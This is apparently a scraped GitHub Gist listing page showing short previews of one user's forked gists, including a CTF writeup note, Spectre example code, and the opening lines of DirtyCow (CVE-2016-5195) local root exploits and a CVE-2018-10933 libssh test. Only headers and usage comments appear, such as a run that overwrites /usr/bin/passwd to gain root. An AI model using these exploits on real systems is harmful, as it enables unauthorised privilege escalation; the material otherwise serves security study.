It has been a long time since I finish(nearly) these problems...
In linux, 0 is std_input, 1 is std_output, 2 is std_error_output.
We just need to send LETMEWIN to std_input and set fd to 0 which means (our input - 0x1234) == 0.
thinkycx
/ README.MD
Created
February 6, 2017 16:10
— forked from ihciah/README.MD
Pwnable.kr Toddler's Bottle writeup
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /usr/bin/env python | |
| # encoding:utf-8 | |
| import urllib2 | |
| import sys | |
| from poster.encode import multipart_encode | |
| from poster.streaminghttp import register_openers | |
| def poc(): |
thinkycx
/ Kali 2017.1 x64, Docker-ce Install script
Created
December 14, 2017 14:30
— forked from nikallass/Kali 2017.1 x64, Docker-ce Install script
Kali 2017.1 x64, Docker-ce Install script
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # update apt-get | |
| export DEBIAN_FRONTEND="noninteractive" | |
| sudo apt-get update | |
| # remove previously installed Docker | |
| sudo apt-get remove docker docker-engine docker.io* lxc-docker* | |
| # install dependencies 4 cert |
thinkycx
/ spectre.c
Created
January 5, 2018 04:08
— forked from ErikAugust/spectre.c
Spectre example code
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <stdint.h> | |
| #ifdef _MSC_VER | |
| #include <intrin.h> /* for rdtscp and clflush */ | |
| #pragma optimize("gt",on) | |
| #else | |
| #include <x86intrin.h> /* for rdtscp and clflush */ | |
| #endif |
thinkycx
/ fbootfix.md
Created
March 13, 2018 09:08
— forked from smac89/fbootfix.md
Linux Fix Fastboot "no permissions, verify udev rules"
- Unplug your device from the computer and type
lsusbin the terminal. You should get an output similar to this:
Bus 002 Device 002: ID 8087:8000 Intel Corp.
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 002: ID 8087:8008 Intel Corp.
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 003 Device 005: ID 0bda:0129 Realtek Semiconductor Corp. RTS5129 Card Reader Controller
thinkycx
/ cowroot.c
Created
May 22, 2018 13:51
— forked from rverton/cowroot.c
CVE-2016-5195 (DirtyCow) Local Root PoC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * (un)comment correct payload first (x86 or x64)! | |
| * | |
| * $ gcc cowroot.c -o cowroot -pthread | |
| * $ ./cowroot | |
| * DirtyCow root privilege escalation | |
| * Backing up /usr/bin/passwd.. to /tmp/bak | |
| * Size of binary: 57048 | |
| * Racing, this may take a while.. | |
| * /usr/bin/passwd overwritten |
thinkycx
/ dirty_passwd_adjust_cow.c
Created
May 23, 2018 05:32
— forked from ngaro/dirty_passwd_adjust_cow.c
A dirty cow exploit that automatically finds the current user in passwd and changes it's uid to 0
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <sys/mman.h> | |
| #include <fcntl.h> | |
| #include <pthread.h> | |
| #include <unistd.h> | |
| #include <sys/stat.h> | |
| #include <string.h> | |
| #include <stdint.h> | |
| #include <stdlib.h> | |
| #include <sys/types.h> |
thinkycx
/ wahoo_mybuild.sh
Last active
November 1, 2018 19:04
— forked from atulprak/wahoo_mybuild.sh
Compiling Linux Kernel for Pixel 2 devices -- Bash script
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Purpose: Script for building AOSP code and Linux kernel for walleye using open-source toolchains. | |
| # Author: [email protected] | |
| # License: Gnu GPL v. 2 | |
| # License is same as Linux kernel license, since the code helps compile the Linux kernel for a device | |
| # Change these directory paths to point to your aosp and NDK folders. | |
| # reference: https://www.digitalocean.com/community/tutorials/how-to-build-android-roms-on-ubuntu-16-04 | |
| # edited by thinkycx 201809 | |
| export KERNEL=/root/AOSP/msm |
thinkycx
/ CVE-2018-10933-test
Last active
October 21, 2018 15:52
— forked from mlosapio/CVE-2018-10933-test
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # Based on https://www.openwall.com/lists/oss-security/2018/08/16/1 | |
| # untested CVE-2018-10933 | |
| ''' | |
| # fixed - test by thinkycx and | |
| Traceback (most recent call last): | |
| File "10933.py", line 12, in <module> | |
| new_auth_accept = paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_USERAUTH_SUCCESS] | |
| TypeError: 'property' object has no attribute '__getitem__' |
thinkycx
/ dirtycow.c
Created
November 25, 2018 06:53
— forked from KrE80r/c0w.c
PTRACE_POKEDATA variant of CVE-2016-5195
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * A PTRACE_POKEDATA variant of CVE-2016-5195 | |
| * should work on RHEL 5 & 6 | |
| * | |
| * (un)comment correct payload (x86 or x64)! | |
| * $ gcc -pthread c0w.c -o c0w | |
| * $ ./c0w | |
| * DirtyCow root privilege escalation | |
| * Backing up /usr/bin/passwd.. to /tmp/bak | |
| * mmap fa65a000 |
OlderNewer